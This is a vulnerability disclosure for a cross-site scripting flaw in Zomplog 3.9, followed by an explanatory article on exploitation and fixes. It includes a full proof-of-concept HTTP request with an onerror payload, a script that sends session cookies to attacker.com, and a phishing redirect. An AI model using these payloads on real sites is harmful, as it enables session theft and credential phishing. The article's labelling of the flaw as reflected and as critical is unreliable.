Zomplog 3.9 - Cross-site scripting (XSS)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-28 
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty


Zomplog 3.9 Cross-Site Scripting (XSS) Vulnerability: A Deep Dive into Exploitation and Mitigation

On July 22, 2023, cybersecurity researcher Mirabbas Ağalarov disclosed a critical cross-site scripting (XSS) vulnerability in Zomplog 3.9, a PHP-based content management system (CMS) developed by Zomp.nl. This flaw enables attackers to inject malicious scripts into web pages, potentially compromising user sessions, stealing sensitive data, or redirecting users to phishing sites. The vulnerability stems from improper input sanitization in the copyhtml action handler, making it a prime example of how insecure code practices can lead to widespread exploitation.

Understanding the Vulnerability: How XSS Works in Zomplog 3.9

XSS occurs when an application fails to validate or sanitize user input before rendering it in the browser. In Zomplog 3.9, the zimplit.php endpoint allows users to copy HTML content and save it under a new filename. The action=copyhtml parameter is used to perform this operation, but it does not properly escape or filter user-provided HTML content.

Attackers can exploit this by crafting malicious HTML payloads, such as:

<img src=x onerror=alert(5)>

This simple payload leverages the onerror attribute of the <img> tag. Since the image source is set to x (an invalid URL), the browser triggers the onerror event, executing the JavaScript alert(5). This demonstrates a classic reflected XSS attack — the malicious script is reflected back to the user upon page load.

Exploitation Steps: A Step-by-Step Breakdown

  • Step 1: Login to the Zomplog account — The attacker must first gain access to the CMS interface, typically via a valid username and password.
  • Step 2: Create a new page — Using the "Add new page" feature, the attacker prepares to inject malicious code.
  • Step 3: Insert the XSS payload — In the page title field, the attacker enters: <img src=x onerror=alert(5)>. This is URL-encoded as %3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E.
  • Step 4: Submit the request — The payload is sent via a POST request to /zimplitcms/zimplit.php?action=copyhtml, with the malicious title as part of the title parameter.
  • Step 5: Access the page via the menu — Once saved, the attacker navigates to the page through the site menu. The browser renders the HTML, triggering the alert(5) popup.

POC Request Analysis: The Attack Vector

Below is the actual HTTP request used in the proof-of-concept (POC):

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Origin: http://localhost
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

Key observations:

  • The title parameter contains the unescaped XSS payload, which is directly rendered in the HTML output.
  • The newname parameter includes the malicious content in the filename, which may trigger further unintended behavior if the system uses filenames to generate URLs.
  • The request uses application/x-www-form-urlencoded, indicating that the system treats the data as form input — but fails to sanitize it.

Impact and Risk Assessment

Risk Level High
Attack Vector Reflected XSS (via user input in title field)
Exploitation Difficulty Low — requires only login access and basic HTML knowledge
Impact Session hijacking, data theft, phishing, defacement, or malware delivery
Target Environment Linux-based servers running PHP

Because Zomplog is a CMS used for managing website content, the XSS vulnerability can be exploited by any authenticated user — including administrators. If an attacker gains access to an admin account, they can embed persistent XSS payloads across multiple pages, leading to long-term compromise.

Real-World Use Cases and Exploitation Scenarios

Imagine a scenario where a malicious user uploads a payload like:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

When this page is accessed by another user, the script runs in their browser, sending the victim's session cookie to the attacker’s server. This enables session hijacking — a common and dangerous attack vector.

Another use case involves redirecting users to a phishing page:

<script>window.location.href='https://fake-login.com'</script>

Users visiting the compromised page are immediately redirected, potentially leading to credential theft.

Security Best Practices and Fixes

To prevent such vulnerabilities, developers must implement the following defensive measures:

  • Input Sanitization — Always escape or filter user input before rendering it in HTML. Use functions like htmlspecialchars() in PHP to encode special characters.
  • Output Encoding — Ensure that all dynamic content is properly encoded based on the context (HTML, JavaScript, URL, etc.).
  • Content Security Policy (CSP) — Implement a strict CSP header to restrict script execution to trusted sources.
  • Role-Based Access Control — Limit the ability to edit content to trusted users only, especially for admin roles.
  • Automated Input Validation — Use frameworks or libraries that enforce secure input handling (e.g., Laravel’s Blade templating engine).

Corrected Code Example: Secure Implementation

Here is a corrected version of the vulnerable code in zimplit.php:

// Before: $title = $_POST['title']; // No validation
// After: $title = htmlspecialchars($_POST['title'], ENT_QUOTES, 'UTF-8');

Explanation: The htmlspecialchars() function converts special characters like <, >, &, and " into their HTML-safe equivalents. This prevents the browser from interpreting the input as executable code. By applying this function, even malicious payloads like <img src=x onerror=alert(5)> will be rendered as plain text, not as active JavaScript.

Additionally, developers should validate that the title field contains only safe HTML elements and reject any script tags or event handlers (e.g., onerror, onclick).

Conclusion: Lessons from Zomplog 3.9

The Zomplog 3.9 XSS vulnerability serves as a stark reminder that even seemingly simple CMS features can become attack vectors if input handling is neglected